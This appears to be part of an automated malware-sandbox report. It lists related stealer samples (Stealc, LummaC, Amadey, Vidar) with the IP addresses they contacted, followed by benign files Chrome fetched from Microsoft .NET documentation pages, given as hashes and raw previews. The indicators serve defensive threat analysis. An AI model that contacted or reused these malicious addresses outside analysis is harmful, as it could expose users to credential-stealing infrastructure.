                                                                                                                                                                                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                Q460725_8952397_6525_PDF.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                n5QCsKJ0CP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                • 4.175.87.197
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                • 23.204.130.19
                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                Aquantia_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                No context
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1432
                                                                                                                                                                                                Entropy (8bit):4.986131881931089
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1154
                                                                                                                                                                                                Entropy (8bit):4.59126408969148
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):19696
                                                                                                                                                                                                Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                                Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):33148
                                                                                                                                                                                                Entropy (8bit):4.917595394577667
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):35005
                                                                                                                                                                                                Entropy (8bit):7.980061050467981
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13842
                                                                                                                                                                                                Entropy (8bit):7.802399161550213
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4897
                                                                                                                                                                                                Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):47062
                                                                                                                                                                                                Entropy (8bit):5.016115705165622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                                SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                                SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                                SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):3130
                                                                                                                                                                                                Entropy (8bit):4.790069981348324
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):18367
                                                                                                                                                                                                Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13339
                                                                                                                                                                                                Entropy (8bit):7.683569563478597
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):18367
                                                                                                                                                                                                Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
